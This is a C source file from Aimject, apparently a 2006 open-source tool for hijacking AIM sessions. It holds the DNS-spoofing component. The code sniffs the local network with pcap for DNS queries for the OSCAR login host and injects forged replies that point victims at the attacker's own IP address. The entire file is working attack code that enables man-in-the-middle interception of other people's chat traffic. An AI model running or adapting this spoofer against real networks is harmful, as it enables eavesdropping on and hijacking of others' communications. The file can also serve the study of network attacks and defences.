/*
 * Aimject
 *
 * Copyright (C) 2006 Jon Oberheide <jon@oberheide.org>
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 */

#include <config.h>
#include <stdio.h>
#include <stdlib.h>
#include <glib.h>
#include <dnet.h>
#include <pcap.h>
#include <gtk/gtk.h>
#include <glade/glade.h>

#include "os.h"
#include "dnsspoof.h"
#include "conn.h"
#include "main.h"

extern aimject_t *aj;

void
dns_spoof(guchar *data, const struct pcap_pkthdr *pkthdr, const guchar *pkt)
{
	guint16 type, class;
	gint dns_len, ans_len, len;
	struct ip_hdr *ip_h;
	struct eth_hdr *eth_h;
	struct udp_hdr *udp_h;
	HEADER *dns_h;
	guchar *dns_data, *dns_end, *ptr;
	guchar buf[1024];
	gchar *src_ip, *dst_ip, *intf_pa;
	gchar hostname[MAXHOSTNAMELEN];

	eth_h = (struct eth_hdr *) pkt;
	ip_h = (struct ip_hdr *) (pkt + ETH_HDR_LEN);
	udp_h = (struct udp_hdr *) (pkt + ETH_HDR_LEN + ip_h->ip_hl * 4);
	dns_h = (HEADER *) (pkt + ETH_HDR_LEN + ip_h->ip_hl * 4 + UDP_HDR_LEN);
	dns_data = (guchar *) dns_h + sizeof(HEADER);
	dns_end = (guchar *) pkt + pkthdr->caplen;
	dns_len = g_ntohs(udp_h->uh_ulen) - UDP_HDR_LEN;

	g_return_if_fail(dns_len >= sizeof(HEADER));
	g_return_if_fail(dns_h->opcode == QUERY);
	g_return_if_fail(g_ntohs(dns_h->qdcount) == 1);
	g_return_if_fail(g_ntohs(dns_h->ancount) == 0);
	g_return_if_fail(g_ntohs(dns_h->nscount) == 0);
	g_return_if_fail(g_ntohs(dns_h->arcount) == 0);

	len = dn_expand((guchar *) dns_h, dns_end, dns_data, hostname, sizeof(hostname));
	g_return_if_fail(len >= 0);

	dns_data += len;
	GETSHORT(type, dns_data);
	GETSHORT(class, dns_data);
	g_return_if_fail(type == T_A);
	g_return_if_fail(class == C_IN);

	g_debug("dns query observed for %s", hostname);
	g_return_if_fail(g_ascii_strcasecmp(hostname, OSCAR_HOST) == 0);

	ans_len = 16;
	ptr = buf + ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + dns_len;
	memcpy(ptr, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04", 12);
	memcpy(ptr + 12, &aj->intf_pa.addr_ip, sizeof(ip_addr_t));

	eth_pack_hdr(buf, eth_h->eth_src, eth_h->eth_dst, ETH_TYPE_IP);
	ip_pack_hdr(buf + ETH_HDR_LEN, 0, IP_HDR_LEN + UDP_HDR_LEN + dns_len + ans_len,
		    rand_uint16(aj->rand), IP_DF, 64, IP_PROTO_UDP,
		    ip_h->ip_dst, ip_h->ip_src);
	udp_pack_hdr(buf + ETH_HDR_LEN + IP_HDR_LEN, g_ntohs(udp_h->uh_dport),
		     g_ntohs(udp_h->uh_sport), UDP_HDR_LEN + dns_len + ans_len);
	memcpy(buf + ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN, dns_h, dns_len);

	dns_h = (HEADER *) (buf + ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN);
	dns_h->qr = 1;
	dns_h->ra = 1;
	dns_h->ancount = g_htons(1);

	ip_checksum(buf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + dns_len + ans_len);
	eth_send(aj->eth, buf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + dns_len + ans_len);

	src_ip = g_strdup(ip_ntoa(&ip_h->ip_dst));
	dst_ip = g_strdup(ip_ntoa(&ip_h->ip_src));
	intf_pa = g_strdup(ip_ntoa(&aj->intf_pa.addr_ip));
	g_debug("dns spoof from %s to %s, %s is at %s", src_ip, dst_ip, hostname, intf_pa);
	g_free(intf_pa);
	g_free(dst_ip);
	g_free(src_ip);
}

gpointer
dnsspoof_init(gpointer data)
{
	gint res;
	pcap_t *pcap;
	gchar *bpf;
	struct bpf_program fp;
	gchar error[PCAP_ERRBUF_SIZE];

	g_debug("dns spoofing thread spawned");

	pcap = pcap_open_live(aj->intf_str_pcap, 65535, 1, 1, error);
	g_assert(pcap != NULL);

	bpf = g_strdup_printf(DNS_BPF, ip_ntoa(&aj->intf_pa.addr_ip));
	res = pcap_compile(pcap, &fp, bpf, 1, 0);
	g_assert(res >= 0);

	res = pcap_setfilter(pcap, &fp);
	g_assert(res != -1);

	g_debug("dns spoofing listening on %s (%s)", aj->intf_str_pcap, bpf);

	pcap_loop(pcap, -1, dns_spoof, NULL);

	g_free(bpf);

	return NULL;
}
